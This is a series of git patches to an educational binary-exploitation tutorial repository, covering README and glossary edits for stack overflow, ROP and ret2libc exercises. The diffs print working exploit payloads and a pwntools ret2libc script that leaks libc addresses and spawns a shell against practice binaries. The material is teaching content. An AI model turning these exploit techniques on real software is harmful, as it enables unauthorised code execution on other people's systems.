Conventions](http://codearcana.com/posts/2013/05/21/a-brief-introduction-to-x86-calling-conventions.html) * [Intro 2: Screwing around with the stack](intro-2) ## Buffer Overflows and ROP: From bfec24f4d308def8e0756d4849e0635e01ca8300 Mon Sep 17 00:00:00 2001 From: Finias Date: Sat, 13 Jan 2018 12:24:19 +0200 Subject: [PATCH 23/48] PLT Definition added --- terms/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/terms/README.md b/terms/README.md index afd5e42..a88f9fd 100644 --- a/terms/README.md +++ b/terms/README.md @@ -12,7 +12,7 @@ binary has a *constant address.* (usually, see PIE) the whole set of standard library functions are somewhere in memory to be used by the program -**PLT:** Stands for . 
The PLT is essentially a wrapper function for all +**PLT:** Stands for Procedure Linkage Table. The PLT is essentially a wrapper function for all functions directly called in the binary. *These are only used in dynamically linked binaries* From c5a486d69296ac94cc3eb96c99a7eb8bec198c66 Mon Sep 17 00:00:00 2001 From: sneakerhax Date: Sun, 28 Jan 2018 01:01:57 -0800 Subject: [PATCH 24/48] Fix spelling mistake --- exercise-4/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exercise-4/README.md b/exercise-4/README.md index e95fe67..811ebc2 100644 --- a/exercise-4/README.md +++ b/exercise-4/README.md @@ -99,7 +99,7 @@ whatever the standard one is on your computer. **The same binary running on a different machine could have a different libc.** All we have to do is grab a copy of that libc and put it in our directory -If you ever exploit a remote binary anf you don't have the libc, there are +If you ever exploit a remote binary and you don't have the libc, there are plenty of places you can get them online. ``` $ cp /lib/i386-linux-gnu/libc.so.6 ./ From 0a86cdb518944a2c03236d3005196f07aad54e19 Mon Sep 17 00:00:00 2001 From: sneakerhax Date: Sun, 28 Jan 2018 01:04:01 -0800 Subject: [PATCH 25/48] fix spelling 2 --- exercise-4/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exercise-4/README.md b/exercise-4/README.md index 811ebc2..a2bb2a1 100644 --- a/exercise-4/README.md +++ b/exercise-4/README.md @@ -119,7 +119,7 @@ r=process("./exercise-4") ``` -after this, we know we'll need the `read()`,`wrte()`, the GOT address of +after this, we know we'll need the `read()`,`write()`, the GOT address of `read()`, and a `pop ; ret` ropgadget, so we add these in. 
```Pyton write_plt = p32(binary.symbols["write"]) From e8b18f381e2dbb551bff4de40dc045efcc5d3c6a Mon Sep 17 00:00:00 2001 From: alichtman Date: Mon, 16 Apr 2018 01:04:48 -0500 Subject: [PATCH 26/48] Fixed grammar and formatting issues --- exercise-1/README.md | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/exercise-1/README.md b/exercise-1/README.md index 3f35b04..1a7266c 100644 --- a/exercise-1/README.md +++ b/exercise-1/README.md @@ -46,7 +46,7 @@ $ strace ./overflow2 $(python -c 'print "A"*32') ... --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x41414141} --- ``` -The address in question is 0x41414141, our four "A"s. What does this mean? +The address in question is `0x41414141`, or four "A"s. What does this mean? Consider the disassembly of the function `vuln()`, as well as `main()` where it's called. ``` @@ -72,13 +72,13 @@ Dump of assembler code for function vuln: End of assembler dump. ``` So you might remember from [Intro 2](../intro-2) that you can overwrite values -on the stack with a `strcpy()` vulnerability. In the lines of `main()` , +on the stack with a `strcpy()` vulnerability. In the lines of `main()`, control is passed to the function`vuln()`. However, `vuln()` needs to know where to come back to in `main()` when it finishes. This is called a return address. In -this case, `vuln()` should jump back to 0x0804851b, the instruction right after +this case, `vuln()` should jump back to `0x0804851b`, the instruction right after `main()` calls `vuln()`. When we get a SEGFAULT that we control, that means that we've overwritten the return address. What can we do with this? The -possibilites are pretty much endless. You have control over the code's flow, +possibilities are pretty much endless. 
You have control over the code's flow, so maybe we can call some other function, namely `give_shell()` ``` $ objdump -d overflow2 | grep give_shell @@ -87,7 +87,7 @@ $ objdump -d overflow2 | grep give_shell Now that we have the address of a useful function, let's see if we can supply *our own* return address. First, as you may remember from the last tutorial, some of these characters aren't printable. We'll need to convert it to an -escape sequence and reverse the order, leaving us with this: "\xad\x84\x04\x08" +escape sequence and reverse the order, leaving us with this: `"\xad\x84\x04\x08"` Now we can substitute it in! ``` $ ./overflow2 $(python -c 'print "A"*28 + "\xad\x84\x04\x08"') From aa0d3dfc8dbe95392984e8453de97c11e3acfb45 Mon Sep 17 00:00:00 2001 From: alichtman Date: Mon, 16 Apr 2018 01:06:32 -0500 Subject: [PATCH 27/48] formatting in exercise-2 --- exercise-2/README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/exercise-2/README.md b/exercise-2/README.md index 4565bab..940068f 100644 --- a/exercise-2/README.md +++ b/exercise-2/README.md @@ -48,7 +48,7 @@ Since ASLR randomizes libc addresses as well, the binary needs some way to reliably call the functions it uses. The PLT is a wrapper function for the actual code in libc. **The PLT is a part of the binary, it's address doesn't change.** If you call `system@plt`, you'll call `system()`. So how are we going -to do this? Since the PLT is a part of the binary, we'll use objump +to do this? Since the PLT is a part of the binary, we'll use `objdump`. ``` $ objdump -d overflow | grep system 080483d0 : @@ -79,9 +79,9 @@ the stack. Calling a function in an exploit has to take this form: \[address of function\] \[return address\] \[argument\] Now when the programmer wrote this, (I wrote this one :P) he thought he could -be smart and make fun of you for not having a "/bin/sh" string. However, he +be smart and make fun of you for not having a `"/bin/sh"` string. 
However, he didn't realize that by including that string in the code, the string is in the -binary. We can use gdb to find the string! +binary. We can use `gdb` to find the string! ``` $ gdb -q ./overflow From 6635e7b62ce4b723c40eff321167c99c0f01227e Mon Sep 17 00:00:00 2001 From: alichtman Date: Mon, 16 Apr 2018 01:08:51 -0500 Subject: [PATCH 28/48] Formatting and grammar refactoring in exercise-3 --- exercise-3/README.md | 18 +++++++++--------- 1 file changed, 9 insertions(+), 9 deletions(-) diff --git a/exercise-3/README.md b/exercise-3/README.md index f98ee9a..9fe8051 100644 --- a/exercise-3/README.md +++ b/exercise-3/README.md @@ -1,6 +1,6 @@ # Follow the Yellow Brick Functions -In this problem, I smartened up. Nowhere in the binary will you find "/bin/sh" +In this problem, I smartened up. Nowhere in the binary will you find `"/bin/sh"` ```C # include @@ -28,7 +28,7 @@ int main(int argc, char **argv) { } ``` -As you'll remember from the previous exercise, putting "/bin/sh" in the binary +As you'll remember from the previous exercise, putting `"/bin/sh"` in the binary was a mistake. This problem is geared very similarly with a little bit of extra finesse. First things first, we'll find the offset of `%eip` @@ -50,10 +50,10 @@ scratch pad for hackers. We can use it to reliably store data when the stack is randomized. We could use the GOT, but it might mess up functions we need. Knowing this, how can we get a shell? -The answer lies in the functions used. We have the strings "/b" and "in/" in -the binary. We also have "sh" at the end of the second print statement! :D +The answer lies in the functions used. We have the strings `"/b"` and `"in/"` in +the binary. We also have `"sh"` at the end of the second print statement! :D -Let's use objdump to get some function addresses: +Let's use `objdump` to get some function addresses: ``` $ objdump -d overflow | grep ">:" ... 
@@ -63,7 +63,7 @@ $ objdump -d overflow | grep ">:" 080483a0 : ``` -Next we will need to find the start of the .bss segment +Next we will need to find the start of the `.bss` segment ``` $ gdb -q ./overflow @@ -104,7 +104,7 @@ overflow : 0x80486ce --> 0x75006873 ('sh') overflow : 0x80496ce --> 0x75006873 ('sh') ``` -Now with these we can learn one more importand concept: Chaining Functions. +Now with these we can learn one more important concept: Chaining Functions. In order to chain functions together we need to somehow remove the arguments off of the stack. As you know from before, standard x86 function calls look like: @@ -154,9 +154,9 @@ Let's give the exploit a try: "\x80\x83\x04\x08" + "\x3e\x86\x04\x08" + "\x30\xa0\x04\x08" + "\x4e\x95\x04\x08" + "\x70\x83\x04\x08" + "\x3e\x86\x04\x08" + "\x30\xa0\x04\x08" + "\x65\x95\x04\x08" + "\x70\x83\x04\x08" + -"\x3e\x86\x04\x08" + "\x30\xa0\x04\x08" + "\xce\x96\x04\x08" + +"\x3e\x86\x04\x08" + "\x30\xa0\x04\x08" + "\xce\x96\x04\x08" + "\xa0\x83\x04\x08" + "FAKE" + "\x30\xa0\x04\x08"') ``` -You should get a shell (Although It might we a weird one and not let you do +You should get a shell (Although it might be a weird one and not let you do anything. I forgot to set privs :/ The concept still stands :P) From e1d52f014ea9c0443759e7d8a07515af5cbfce5c Mon Sep 17 00:00:00 2001 From: alichtman Date: Mon, 16 Apr 2018 01:09:57 -0500 Subject: [PATCH 29/48] Formatting in exercise-3.5 --- exercise-3.5/README.md | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/exercise-3.5/README.md b/exercise-3.5/README.md index 43af273..b4f13d4 100644 --- a/exercise-3.5/README.md +++ b/exercise-3.5/README.md @@ -17,7 +17,6 @@ context(arch='i386', os='linux') this just sets the context for other functions that we'll describe later. - ``` binary = ELF("some_challenge") libc = ELF("some_libc") @@ -28,7 +27,6 @@ useful; they give you access to a wide array of methods and data fields. 
I almost always have both of these lines in my script, even if the libc one is commented out. - ``` r=process("./some_challenge") ``` @@ -51,7 +49,7 @@ say for example the address of write() in a binary is 0xdeadbeef \xef\xbe\xed\xda ``` -would be the resulting python escape. However, pwntools can take care of this. +would be the resulting python escape. However, `pwntools` can take care of this. ``` write = p32(binary.symbols["write"]) @@ -70,5 +68,5 @@ r.send("This also sends a string") ``` Now me telling you all of this is kind of useless without you getting real -experience.** At this point I would strongly recommend solving the first 3 +experience. **At this point I would strongly recommend solving the first 3 challenges using pwntools.** From a1620ed18fdebf4a39b0095e5b48273e8982eb34 Mon Sep 17 00:00:00 2001 From: alichtman Date: Mon, 16 Apr 2018 01:13:26 -0500 Subject: [PATCH 30/48] Formatting and word smithing in excercise-4 --- exercise-4/README.md | 32 +++++++++++++++----------------- 1 file changed, 15 insertions(+), 17 deletions(-) diff --git a/exercise-4/README.md b/exercise-4/README.md index a2bb2a1..87d0013 100644 --- a/exercise-4/README.md +++ b/exercise-4/README.md @@ -7,7 +7,7 @@ call to `system()`? The simple answer: get a shell anyways. :) The long answer is a bit more complicated. This attack is called a return to -libc, or ret2libc for short. If you don't remember the PLT and GOT from before, +`libc`, or `ret2libc` for short. If you don't remember the PLT and GOT from before, now is a good time to check the [glossary](../terms) and maybe do some googling. You'll recall that ASLR randomizes the libc address, but the good news is that with arbitrary `read()` and `write()` you can easily circumvent @@ -38,7 +38,6 @@ address. Still confused? I was when I first learned this, but I'll try to explain as I go. 
- First, we have to calculate the offset of `%eip` ``` $ python -c 'print "A"*140 + "BBBB"' | strace ./exercise-4 @@ -48,14 +47,13 @@ $ python -c 'print "A"*140 + "BBBB"' | strace ./exercise-4 After 140 bytes, we have `%eip` -From here, we need to leak the address of a libc function. +From here, we need to leak the address of a `libc` function. We can do this by calling `write(1,&function,4)` I'll be using the GOT address of `read()` (remember that the GOT is an array of pointers into libc) - ``` $ objdump -d exercise-4 | grep ">:a" ... @@ -70,7 +68,6 @@ $ objdump -R exercise-4 With these addresses, we get the following exploit. - ``` python -c 'print "A"*140 + "\x70\x83\x04\x08" + "RETN" + "\x01\x00\x00\x00"+ "\x0c\xa0\x04\x08" + "\x04\x00\x00\x00"' | ./exercise-4 @@ -94,18 +91,18 @@ $ ldd exercise-4 /lib/ld-linux.so.2 (0xf76fa000) ``` -Since this is a local binary challenge, the libc file is just going to be +Since this is a local binary challenge, the `libc` file is just going to be whatever the standard one is on your computer. **The same binary running on a -different machine could have a different libc.** +different machine could have a different `libc`, and therefore give you different results.** -All we have to do is grab a copy of that libc and put it in our directory -If you ever exploit a remote binary and you don't have the libc, there are +All we have to do is grab a copy of that `libc` and put it in our directory +If you ever exploit a remote binary and you don't have the `libc`, there are plenty of places you can get them online. ``` $ cp /lib/i386-linux-gnu/libc.so.6 ./ ``` -Now we need pwntools. +Now we need `pwntools`. We'll start our script off with the typical items: @@ -118,9 +115,9 @@ libc = ELF("libc.so.6") r=process("./exercise-4") ``` - after this, we know we'll need the `read()`,`write()`, the GOT address of `read()`, and a `pop ; ret` ropgadget, so we add these in. 
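Before switching to `pwntools`, it can help to rebuild the raw `python -c` leak payload from above piece by piece. This is only a sketch in Python 3 (the one-liners in this README are Python 2), and it makes a few assumptions: `p32` here is a hypothetical stand-in built on `struct`, not the pwntools function itself, and `0x08048370` is assumed to be `write@plt` based on how the one-liner uses it. `0x0804a00c` is the GOT slot for `read()` from `objdump -R`.

```python
import struct


def p32(value):
    # Hypothetical stand-in for pwntools' p32(): pack a 32-bit value little-endian.
    return struct.pack("<I", value)


WRITE_PLT = 0x08048370  # assumed to be write@plt (taken from the one-liner above)
READ_GOT = 0x0804A00C   # GOT slot for read(), from `objdump -R exercise-4`


def build_leak_payload():
    payload = b"A" * 140       # padding up to the saved return address
    payload += p32(WRITE_PLT)  # overwrite the return address with write@plt
    payload += b"RETN"         # placeholder return address for write() itself
    payload += p32(1)          # arg 1: fd = 1 (stdout)
    payload += p32(READ_GOT)   # arg 2: buf = address of read()'s GOT entry
    payload += p32(4)          # arg 3: count = 4 bytes
    return payload


leak_payload = build_leak_payload()
```

The layout is the same `[address of function] [return address] [arguments]` form used in the earlier exercises. The pwntools version of these values follows.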
+ ```Pyton write_plt = p32(binary.symbols["write"]) read_GOT = p32(binary.symbols["got.read"]) @@ -137,9 +134,9 @@ r.recvline() Now we should start building our exploit. We want to try to avoid using the escape strings from before, it makes for nicer code and forces you to use -pwntools the right way. +`pwntools` the right way. -we add: +So, we add: ```Python exploit = "A"*140 # EIP offset @@ -155,8 +152,8 @@ r.sendline(exploit) ``` Now here's the cool part. Since we know that the program prints out the address -of `read()` in the libc (remember those funky bytes from earlier before the -SEGFAULT?) we can take those and calculate the base address of libc. This +of `read()` in the `libc` (remember those funky bytes from earlier before the +SEGFAULT?) we can take those and calculate the base address of `libc`. This indirectly means that we can call any function in the standard library. ``` @@ -174,8 +171,8 @@ subtract `read()`s address in the regular libc, giving us the base address for this runtime. In the last line, we add the offset of `system()` in the libc to our calculated base. This gives us the address of system for this runtime. -The best part of this whole show is that the pesky "/bin/sh" string we seem to -keep needing is in the libc! We can calculate the address of that as well! +The best part of this whole show is that the pesky `"/bin/sh"` string we seem to +keep needing is in the `libc`! We can calculate the address of that as well! ``` binsh = p32(libc_base + libc.search("/bin/sh").next()) @@ -184,6 +181,7 @@ binsh = p32(libc_base + libc.search("/bin/sh").next()) Now all we've got to do is send our exploit with some extra padding (it was 140 before, but now it's 148 since we overflow from before the stack frame) and we get a shell. + ``` r.sendline("A"*148+ system + "RETN" + binsh + binsh) # <- 148?????? why 148? 
r.interactive() From e9e92dda8ba6667b603489871dc29195fb4d50c1 Mon Sep 17 00:00:00 2001 From: alichtman Date: Mon, 16 Apr 2018 01:23:24 -0500 Subject: [PATCH 31/48] Rewrote sections of intro-1 for clarity and accuracy --- intro-1/README.md | 54 +++++++++++++++++++++++++---------------------- 1 file changed, 29 insertions(+), 25 deletions(-) diff --git a/intro-1/README.md b/intro-1/README.md index 515177c..d2ecbe6 100644 --- a/intro-1/README.md +++ b/intro-1/README.md @@ -1,8 +1,8 @@ # Intro 1: What is a binary, really? -In short, a binary is what happens when you take high level code such as C or -C++, and compile it into something the computer can actually run. I believe in -hands on learning, so we can take a look inside one to really find out. +In short, a binary is the output file that the computer can actually run when you +compile high level code, such as C or C++. I believe in hands on learning, so +we can take a look inside one to really find out. Consider the file [hello_world.c](hello_world.c): ```C @@ -12,22 +12,27 @@ int main() { } ``` -This is your average C file, more or less. It's got a main, some includes, and -a little bit of code to be run. However, your computer can't actually run it. -In order to make it usable, we can run: +This is your average C file, more or less. It's got a main function, some +includes, and a little bit of code to be run. However, your computer can't +actually run it. In order to make it usable, we must compile it: + ``` $ gcc -m32 hello_world.c -o hello_world.bin ``` -You can ignore the `-m32` argument (you'll learn about it later), but the -`-o hello_world.bin` simply specifies what the name of the output file is. + +You can ignore the `-m32` argument (we'll talk about it later), but the +`-o hello_world.bin` simply specifies what the name of the output file +is going to be. From here, we can execute it: ``` $ ./hello_world.bin Hello World! ``` + Unsurprisingly, we get "Hello World!" as the output. 
But let's go a bit deeper. -We can open gdb (GNU Debugger) and see what's happening under the hood: +We can open `gdb (GNU Debugger)` and see what's happening under the hood: + ``` $ gdb -q ./hello_world.bin Reading symbols from ./hello_world.bin...(no debugging symbols found)...done. @@ -44,13 +49,12 @@ Dump of assembler code for function main: End of assembler dump. gdb-peda$ quit ``` -Firstly, your prompt probably looks like `(gdb)`, whereas mine is `gdb-peda$`. -Don't worry about this, my gdb is modified. -The weird stuff that gdb showed us is called assembly language. It's -essentially the lowest level human readable code out there. Each line of that -code maps one to one with a machine instruction. Let me break this down for -you. +Your prompt probably looks like `(gdb)`, whereas mine is `gdb-peda$`. Don't worry about this, my gdb is modified. + +The weird code that `gdb` displayed is called assembly language. It's the lowest +level human readable code out there. Each line maps directly to a machine instruction. +Let's break this down. ``` 0x0804841d <+0>: push %ebp @@ -58,26 +62,26 @@ you. 0x08048420 <+3>: and $0xfffffff0,%esp 0x08048423 <+6>: sub $0x10,%esp ``` -First, the numbers you see on the left are addresses. Just like your house -address, `0x0804841d` is where the instruction ` push %ebp` lives. These -first four instructions are just conventions for a function, in this case -`main()`. + +The numbers you see on the left are addresses. You can think of these just like your house +address: `0x0804841d` is where the instruction `push %ebp` lives. These +first four instructions are just conventions for a function, in this case `main()`. ``` 0x08048426 <+9>: movl $0x80484d0,(%esp) 0x0804842d <+16>: call 0x80482f0 ``` -These instructions are what actually prints out our "Hello World!". The program -moves the address of the string "Hello World!" into the memory that `%esp` -points to. `%esp` is a register. 
It holds four bytes of information for quick -access, usually some address. Our program then calls `puts()`, which prints out +These instructions are what actually print out "Hello World!". The program +moves the address of the string `"Hello World!"` into the memory address that `%esp` +points to. `%esp` is a register, which you can think of as a special place the processor uses for storing values it needs quick access to. Each register can hold up to four bytes, usually some memory address. Our program then calls the `puts()` function, which prints out whatever is at the address we supplied. + ``` 0x08048432 <+21>: leave 0x08048433 <+22>: ret ``` -Finally, these last two just pass control from our `main()` back to the C -library, which does some cleaning up and then exits. We'll be learning more +The last two instructions just return control from our `main()` function back to the C +library, which does some clean up and then exits the program. We'll be learning more about how these binaries function in later tutorials. From 1ff091f1d45be0da4f53c71c6711e75f72fb6c78 Mon Sep 17 00:00:00 2001 From: alichtman Date: Mon, 16 Apr 2018 01:36:11 -0500 Subject: [PATCH 32/48] Rewrote buffer overflow attack explanation --- intro-2/README.md | 66 +++++++++++++++++++++++++++++------------------ 1 file changed, 41 insertions(+), 25 deletions(-) diff --git a/intro-2/README.md b/intro-2/README.md index 899f0a8..1ae6ec4 100644 --- a/intro-2/README.md +++ b/intro-2/README.md @@ -3,8 +3,8 @@ **Credit to [Picoctf 2013](2013.picoctf.com) for the binary and source used here.** -Now that you've gotten your feet wet with binaries, it's time to dive in -headfirst. Consider the file [overflow1.c]() +Now that you've gotten your feet wet with binaries, it's time to dive in to exploitation with the stack. 
Consider the file [overflow1.c]() + ```C #include #include @@ -39,11 +39,14 @@ int main(int argc, char **argv) { return 0; } ``` -You can tell just by reading through it that the obvious objective here is to -make `win==1` a true statement, but we're going to ignore that for a few + +You can tell just by reading through this file that the obvious objective here is to +make `win == 1` a true statement, but we're going to ignore that for a few minutes to learn about the stack. The stack is dynamic memory that the program -uses to store addresses, arguments, and all sorts of other goodies. For -example: +uses to store addresses, arguments, and all sorts of other goodies. + +Here's an example stack dump: + ``` $ ./overflow1-3948d17028101c40 Usage: stack_overwrite [str] @@ -75,10 +78,12 @@ Stack dump: win = 0 Sorry, you lose. ``` -Now if you know a thing or two about ASCII, you'll know that 0x41 is the value -of "A". At the bottom of the stack dump, you'll notice that the beginning of -the buffer contains 0x41414141, or our four A's. Now we can run it again, only -this time we'll put a few more. Pay attention to the addresses on the left :) + +Now if you know a thing or two about ASCII, you'll know that `0x41` is the value +of the character `A`. At the bottom of the stack dump, you'll notice that the beginning of +the buffer contains `0x41414141`, or our four `A`'s. Now we can run it again, only +this time we'll store a few more `A`'s. Pay attention to the addresses on the left :) + ``` /overflow1-3948d17028101c40 $(python -c 'print "A"*76') Stack dump: @@ -108,25 +113,36 @@ Stack dump: win = 1094795585 Sorry, you lose. ``` -This bit: `$(python -c 'print "A"*76')` just makes python print out 76 "A"s. -Now you'll notice that the addresses on the left are completely different than -the first run. This is normal. Most binaries these days have ASLR enabled, a -protection that randomizes stack addresses from run to run. 
However, you might -notice that `win = 1094795585` according to the stack dump. What just happened? + +This shell command: `$(python -c 'print "A"*76')` tells python to print out 76 "A"s. + +Notice that the addresses on the left are completely different than the first run. This is normal, and due to something called `ASLR`, or Address Space Layout Randomization. Most modern OSes have `ASLR` enabled, which is protection that randomizes stack addresses on each run of a program. + +Now, you might notice that `win = 1094795585` according to the stack dump. What just happened? Back to the source: + ```C char buf[64]; strcpy(buf, str); ``` -Our buffer only holds 64 bytes. However, `strcpy()` is a dangerous function. -The buffer we provide contains 76 bytes. `strcpy()` doesn't care about checking -lengths. Instead, those extra 12 bytes that don't fit just get thrown onto the -stack. The value of `win` was stored right next to our buffer, so let's try to -set `win=1.` This is where things get a bit tricky. "1", as in the string, is -0x30. We need to submit 0x1, which isn't printable. Since `win` is right next -to our buffer on the stack, we can just submit 64 "A"s, followed by one "\x01" -to leak into the last byte of `win`. + +`strcpy()` is a dangerous function! Our buffer only holds 64 bytes, however, the buffer we provide contains 76 bytes. +And `strcpy()` doesn't care about checking lengths. + +So what happens to those extra 12 bytes that don't fit? They just get thrown onto the +stack. + +The value of `win` was stored right next to our buffer, so next, let's try to +set the value of `win` to `1`. + +This is where things get a bit tricky... + +`"1"`, in string format, is `0x30` in hex. Note the different from integer `1`, which is `0x1` in hex, and isn't printable. + +Since `win` is right next to our buffer on the stack, we can just submit 64 `A`'s in character format, followed by a single `"\x01"` +to leak into the last byte of `win`, setting `win = 1`. 
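If the byte arithmetic feels hand-wavy, here is a small model of it. It is a sketch in Python 3 (not the Python 2 used in the one-liners), and it assumes what the text above says: `win` is a 4-byte little-endian integer sitting directly after the 64-byte `buf`. The helper name `win_after_overflow` is made up for this illustration, and anything written past `win` is simply ignored.

```python
import struct

BUF_SIZE = 64  # char buf[64] in vuln()


def win_after_overflow(arg, initial_win=0):
    """Model strcpy(buf, arg), assuming `win` is stored right after `buf`."""
    # Fake stack slice: 64 bytes of buf followed by the 4 bytes of win.
    memory = bytearray(BUF_SIZE) + bytearray(struct.pack("<i", initial_win))
    data = arg + b"\x00"             # strcpy() also copies the terminating NUL
    n = min(len(data), len(memory))  # bytes landing past win are not modeled
    memory[:n] = data[:n]
    # Read win back the way the CPU would: as a little-endian 32-bit integer.
    return struct.unpack("<i", bytes(memory[BUF_SIZE:BUF_SIZE + 4]))[0]


win_76_as = win_after_overflow(b"A" * 76)             # the earlier run with 76 A's
win_payload = win_after_overflow(b"A" * 64 + b"\x01")  # the payload described above
```

In this model the 76 `A`'s leave `0x41414141` in `win`, which is the `1094795585` from the stack dump. With the 64 `A`'s plus `"\x01"`, the `\x01` lands in the lowest byte of `win`, and the NUL terminator plus the bytes that were already zero keep the rest at zero.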
+ ``` $ ./overflow1-3948d17028101c40 $(python -c 'print "A"*64 + "\x01"') Stack dump: @@ -159,5 +175,5 @@ overflow1-3948d17028101c40 overflow1-3948d17028101c40.c README.md $ exit ``` -If you try this for yourself, you'll get a shell. You sucessfully have -manipulated the stack to give you what you want. +If you try this for yourself, you'll get a shell. You've now sucessfully +executed a buffer overflow attack! From 42e25b055f9c28f446ba392435d8ada55b515de8 Mon Sep 17 00:00:00 2001 From: alichtman Date: Mon, 16 Apr 2018 01:58:11 -0500 Subject: [PATCH 33/48] Updated README --- README.md | 16 +++++++++------- 1 file changed, 9 insertions(+), 7 deletions(-) diff --git a/README.md b/README.md index 5f8d0ad..7183044 100644 --- a/README.md +++ b/README.md @@ -4,14 +4,15 @@ Greetings, fellow hacker, hobbyist, or computer enthusiast. If you've been looking for a place to start learning binary exploitation, then you're in luck. -This tutorial is intended for anyone with experience in coding, Ideally C or +This tutorial is intended for anyone with experience in coding, ideally C or C++, but I only knew Python when I started. + Written by someone who is just barely better than "incompetent," I'll be explaining how I learned my skills. These tutorials will be a bit long winded, but hopefully they will be informative and entertaining. Please feel free to contact me about any clarifications that should be included in the tutorials. -**This is intended for linux. It's free if you don't already have it. Don't +**This is intended for Linux. It's free if you don't already have it. Don't want to dual boot? Get a VM.** -Best of luck @@ -19,6 +20,7 @@ want to dual boot? Get a VM.** [Bretley](https://github.com/Bretley) ## The Grand Glossary of Terms + I've compiled this list of as many useful things as I could find. It contains all sorts of goodies that I wish I had found or had explained to me earlier. If you have a question, it can probably be answered in here. 
Otherwise, get your @@ -27,21 +29,21 @@ Google-Fu on * [The Glossary](terms) ## External Tools. + I strongly recommend you install and use the following tools to make your life a bit easier: * [longld/peda](https://github.com/longld/peda/): I use this tool in all of these tutorials. It provides a wide range of useful functions and makes `gdb` -far more user friendly. Just follow the install instructions in the repo. + far more user friendly. Just follow the install instructions in the repo. * [Gallopsled/pwntools](https://github.com/Gallopsled/pwntools): pwntools is an exploit framework built in my favorite language, python. It has a whole slew -of useful functions and chicanery that makes the exploit process more fun and -less painful. It can be installed by running `sudo pip install pwntools` - - + of useful functions and chicanery that makes the exploit process more fun and + less painful. It can be installed by running `sudo pip install pwntools` ## Introductory Tutorials: + * [Setup Script](./install.sh) * [Intro 1: What is a binary, really?](intro-1) * [Companion Video](https://youtu.be/6cNbKnxbAWw) From e6d8c2a86bf6712bbcd533b2931465541d787d79 Mon Sep 17 00:00:00 2001 From: alichtman Date: Mon, 16 Apr 2018 01:58:44 -0500 Subject: [PATCH 34/48] Restructured glossary, replaced incorrect information with correct information, formatting and wording --- terms/README.md | 81 ++++++++++++++++++++++--------------------------- 1 file changed, 37 insertions(+), 44 deletions(-) diff --git a/terms/README.md b/terms/README.md index a88f9fd..466c0b8 100644 --- a/terms/README.md +++ b/terms/README.md @@ -1,69 +1,62 @@ -# Words, Terms, and Phrases +# Glossary of Terms -##### This will your dictionary throughout these exercises. If it's not in here, -##### Contact me to ask and I will update it. +Note: If you have a term you'd like added to the list, add an Issue or open a Pull Request. 
-## General terms for binaries: +## Technical Terms -**Binary:** The binary is the compiled C or C++ file. Anything that is in the -binary has a *constant address.* (usually, see PIE) +* **ASLR (Address Space Layout Randomization):** Security measure in modern OSes to randomize stack and libc addresses on each program execution. -**libc:** A binary is *dynamically linked* and has a libc file. This means that -the whole set of standard library functions are somewhere in memory to be used -by the program +* **Binary:** A binary is the output file from compiling a C or C++ file. Anything in the +binary has a *constant address* (usually... see PIE.) -**PLT:** Stands for Procedure Linkage Table. The PLT is essentially a wrapper function for all -functions directly called in the binary. *These are only used in dynamically -linked binaries* +* **Canary:** A canary is some (usually random) value that is used to verify that +nothing has been overrwritten. Programs may place canaries in memory, and +check that they still have the exact same value after running potentially +dangerous code, verifying the integrity of that memory. -**GOT:** Stands for Global Offset Table. The GOT is a string of pointers into -libc. The PLT calls whatever address is loaded into the GOT at runtime. +* **GOT (Global Offset Table):** The GOT is a table of addresses stored in the data section of memory. Executed programs use it to look up the runtime addresses of global variables that are unknown at compile time. -**Stack:** The stack is part of the memory for a binary. Local variables and -pointers are often stored here. The stack can be randomized. +* **Heap:** The heap is a far more reliable memory space similar to the stack. +However, usage of the heap has to be invoked by the coder, so heap problems are +often their own category of exploitation -**ASLR:** Stands for Address Space Layout Randomization. This means that the -stack and libc addresses are randomized from runtime to runtime. 
+* **libc:** A binary is *dynamically linked* and has a libc file. This means that +the whole set of standard library functions are located somewhere in the memory used +by the program. -**PIE:** Stands for Position Independent Executable. This is essentially ASLR -but for the binary itself. When this protection is enabled, locations of actual -code in the binary are randomized. +* **NX (Non-Executable):** Security measure in modern OSes to separate processor instructions (code) and data (everything that's not code.) This prevents memory from being both executable and writable. -**NX:** Stands for Non-Executable. This means that no memory is both writable -and executable, so shellcode is useless unless you bypass it. I don't really -cover binaries without NX because they aren't common. +* **PIE (Position Independent Executable):** Essentially ASLR, but for the binary itself. +When this protection is enabled, locations of actual code in the binary are randomized. -**ROP:** Stands for Return Oriented Programming. In regular terms it means that -we reuse tiny bits of code throughout the binary to get what we want. +* **PLT (Procedure Linkage Table):** The PLT is essentially a wrapper function for all +functions directly called in the binary. *Only used in dynamically +linked binaries*. -**Heap:** The heap is a far more reliable memory space similar to the stack. -However, usage of the heap has to be invoked by the coder, so heap problems are -often their own category of exploitation +* **ROP (Return Oriented Programming):** Reusing tiny bits of code throughout the binary to construct commands we want to execute. -**Canary:** A canary is some (usually random) value that is used to verify that -nothing has been overrwritten. Programs may place canaries into memory and -check that they still have the exact same value asfter running potentially -dangerous code, verifying the integrity of that memory. +* **Stack:** The stack is part of the memory for a binary. 
Local variables and +pointers are often stored here. The stack can be randomized. -## Important functions to look out for: -TODO: ADD MORE. +## Important Functions to Watch Out For: -`system()` : This function can be used to execute commands or even other -binaries if called properly. I think it defaults to sh to handle commands on -most linux flavors +TODO: ADD MORE. -`mprotect()` : This is the function responsible for setting page pivilieges. If +* `mprotect()`: This is the function responsible for setting page pivilieges. If you can call this function with your own arbitrary arguments, you can -effectively bypass NX protection +effectively bypass NX protection. + +* `system()`: This function can be used to execute commands or even other +binaries if called properly. I think it defaults to sh to handle commands on +most Linux flavors. ## General Terms -**Arbitrary:** This word is used to imply the fullness of control that you -might have given an exploit. If you can run *arbitrary* code or read/write -*arbitrary* values, that means you can run, read, or write whatever you choose. +* **Arbitrary:** This word is used to imply the fullness of control that you +might have given an exploit. If you've achieved *arbitrary code execution*, that means you can run, read, or write whatever commands you choose. -**Reliable:** Reliable in the context of binary exploitation is almost exactly +* **Reliable:** Reliable in the context of binary exploitation is almost exactly the same as regular use. An exploit is said to be reliable if it works across different runs consistently. 
